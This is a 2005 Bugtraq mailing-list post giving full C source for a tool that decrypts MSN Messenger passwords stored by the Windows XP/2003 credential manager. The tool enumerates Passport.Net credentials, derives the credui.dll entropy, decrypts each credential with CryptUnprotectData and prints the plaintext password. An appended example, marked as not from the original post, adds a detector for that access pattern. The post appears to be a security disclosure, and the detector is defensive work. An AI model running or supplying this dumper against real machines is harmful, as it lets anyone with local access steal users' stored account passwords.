MSN Messenger Password Decrypter for WinXP/2003

From: ViPeR (viper31337_at_yahoo.co.in)
Date: 08/17/05

    Date: Wed, 17 Aug 2005 19:27:47 +0100 (BST)
    To: bugtraq@securityfocus.com
    
    

    MSN Messenger uses Windows Credential UI [credui.dll]
    on WinXP/2003. Password-Storage mechanism differs in
    these OSes, so the code posted by tombkeeper
    [http://xfocus.net/articles/200408/726.html] doesn't
    seem to work anymore on my OS at least. Also, an
    'entropy' value has been thrown in, which is based on
    credui.dll GUID.

    So, here is the code that fulfils the same purpose -
    but surely works on my OS [WinXP SP2] :)

    /--- Start-Code --/

    /*
     * MSN Messenger Password Decrypter for Windows XP & 2003
     * (Compiled-VC++ 7.0, tested on WinXP SP2, MSN Messenger 7.0)
     * - Gregory R. Panakkal
     * http://www.crapware.tk/
     * http://www.infogreg.com/
     */

    #include <windows.h>
    #include <wincrypt.h>
    #include <stdio.h>

    #pragma comment(lib, "Crypt32.lib")

    //Following definitions taken from wincred.h
    //[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes]

    typedef struct _CREDENTIAL_ATTRIBUTEA {
        LPSTR Keyword;
        DWORD Flags;
        DWORD ValueSize;
        LPBYTE Value;
    } CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

    typedef struct _CREDENTIALA {
        DWORD Flags;
        DWORD Type;
        LPSTR TargetName;
        LPSTR Comment;
        FILETIME LastWritten;
        DWORD CredentialBlobSize;
        LPBYTE CredentialBlob;
        DWORD Persist;
        DWORD AttributeCount;
        PCREDENTIAL_ATTRIBUTEA Attributes;
        LPSTR TargetAlias;
        LPSTR UserName;
    } CREDENTIALA,*PCREDENTIALA;

    typedef CREDENTIALA CREDENTIAL;
    typedef PCREDENTIALA PCREDENTIAL;

    ////////////////////////////////////////////////////////////////////

    typedef BOOL (WINAPI *typeCredEnumerateA)(LPCSTR, DWORD, DWORD *, PCREDENTIALA **);
    typedef BOOL (WINAPI *typeCredReadA)(LPCSTR, DWORD, DWORD, PCREDENTIALA *);
    typedef VOID (WINAPI *typeCredFree)(PVOID);

    typeCredEnumerateA pfCredEnumerateA;
    typeCredReadA pfCredReadA;
    typeCredFree pfCredFree;

    ////////////////////////////////////////////////////////////////////

    void showBanner()
    {
        printf("MSN Messenger Password Decrypter for Windows XP/2003\n");
        printf(" - Gregory R. Panakkal, http://www.infogreg.com \n\n");
    }

    ////////////////////////////////////////////////////////////////////
    int main()
    {
        PCREDENTIAL *CredentialCollection = NULL;
        DATA_BLOB blobCrypt, blobPlainText, blobEntropy;

        //used for filling up blobEntropy
        char szEntropyStringSeed[37] = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
        short int EntropyData[37];
        short int tmp;

        HMODULE hDLL;
        DWORD Count = 0, i;

        showBanner();

        //Locate CredEnumerate, CredRead, CredFree from advapi32.dll
        hDLL = LoadLibrary("advapi32.dll");
        if( hDLL == NULL )
        {
            printf("error!\n");
            return -1;
        }

        pfCredEnumerateA = (typeCredEnumerateA)GetProcAddress(hDLL, "CredEnumerateA");
        pfCredReadA = (typeCredReadA)GetProcAddress(hDLL, "CredReadA");
        pfCredFree = (typeCredFree)GetProcAddress(hDLL, "CredFree");

        if( pfCredEnumerateA == NULL ||
            pfCredReadA == NULL ||
            pfCredFree == NULL )
        {
            printf("error!\n");
            return -1;
        }

        //Get an array of 'credential', satisfying the filter
        //(on failure nothing was returned, so treat it as zero entries)
        if( !pfCredEnumerateA("Passport.Net\\*", 0, &Count, &CredentialCollection) )
            Count = 0;

        if( Count ) //usually this value is only 1
        {

            //Calculate Entropy Data
            //sizeof(szEntropyStringSeed) = 37, terminating NUL included
            for(i=0; i<37; i++)
            {
                tmp = (short int)szEntropyStringSeed[i];
                tmp <<= 2;
                EntropyData[i] = tmp;
            }

            for(i=0; i<Count; i++)
            {
                blobEntropy.pbData = (BYTE *)&EntropyData;
                blobEntropy.cbData = 74; //sizeof(EntropyData)

                blobCrypt.pbData = CredentialCollection[i]->CredentialBlob;
                blobCrypt.cbData = CredentialCollection[i]->CredentialBlobSize;

                //flags = 1 is CRYPTPROTECT_UI_FORBIDDEN
                if( CryptUnprotectData(&blobCrypt, NULL, &blobEntropy, NULL, NULL, 1, &blobPlainText) )
                {
                    printf("Username : %s\n", CredentialCollection[i]->UserName);
                    printf("Password : %ls\n\n", (wchar_t *)blobPlainText.pbData);

                    //output buffer is allocated by CryptUnprotectData
                    LocalFree(blobPlainText.pbData);
                }
            }
        }

        if( CredentialCollection != NULL )
            pfCredFree(CredentialCollection);

        return 0;
    }

    /--- End-Code --/

    URL :
    http://www.infogreg.com/source-code/gpl/msn-messenger-password-decrypter-for-windows-xp-and-2003.html

    rgds,
    Gregory R. Panakkal
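
Added example, not part of the original post or the author's code: a defender-side check that flags the access pattern the posted program produces, namely a process other than the Messenger client enumerating `Passport.Net\*` credentials and then calling `CryptUnprotectData`. The `pid|image|api|argument` trace format, the sample lines and the function name are all constructed for illustration and do not come from any real tool.

```c
#include <stdio.h>
#include <string.h>

/* Constructed trace lines in a hypothetical "pid|image|api|argument" format. */
static const char *SAMPLE_TRACE[] = {
    "812|msnmsgr.exe|CredEnumerateA|Passport.Net\\*",
    "812|msnmsgr.exe|CryptUnprotectData|entropy=74",
    "1440|tool.exe|GetProcAddress|CredEnumerateA",
    "1440|tool.exe|CredEnumerateA|Passport.Net\\*",
    "1440|tool.exe|CryptUnprotectData|entropy=74",
    "2001|notepad.exe|CryptUnprotectData|entropy=0",
};
#define MAX_PROCS 16

/* Stores in `flagged` the PIDs of processes other than `owner` that first
   enumerate Passport.Net\* credentials and later call CryptUnprotectData.
   Returns the number of PIDs stored. */
int find_credential_readers(const char **trace, size_t n, const char *owner,
                            int *flagged, size_t max_flagged)
{
    int seen_enum[MAX_PROCS];          /* PIDs that enumerated Passport.Net\* */
    size_t nseen = 0, nflagged = 0;

    for (size_t i = 0; i < n; i++) {
        int pid;
        char image[32], api[32], arg[64];
        if (sscanf(trace[i], "%d|%31[^|]|%31[^|]|%63[^\n]", &pid, image, api, arg) != 4)
            continue;                  /* malformed line */
        if (strcmp(image, owner) == 0)
            continue;                  /* the client reading its own entry */
        if (strncmp(api, "CredEnumerate", 13) == 0 &&
            strncmp(arg, "Passport.Net\\", 13) == 0) {
            if (nseen < MAX_PROCS)
                seen_enum[nseen++] = pid;
        } else if (strcmp(api, "CryptUnprotectData") == 0) {
            for (size_t j = 0; j < nseen; j++) {
                if (seen_enum[j] != pid)
                    continue;
                if (nflagged < max_flagged)
                    flagged[nflagged++] = pid;
                seen_enum[j] = seen_enum[--nseen];  /* report once per enumeration */
                break;
            }
        }
    }
    return (int)nflagged;
}
```

Matching on the image name alone is a weak identity check; a production rule would compare the full path or the code signature of the calling process.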

            

            
                    

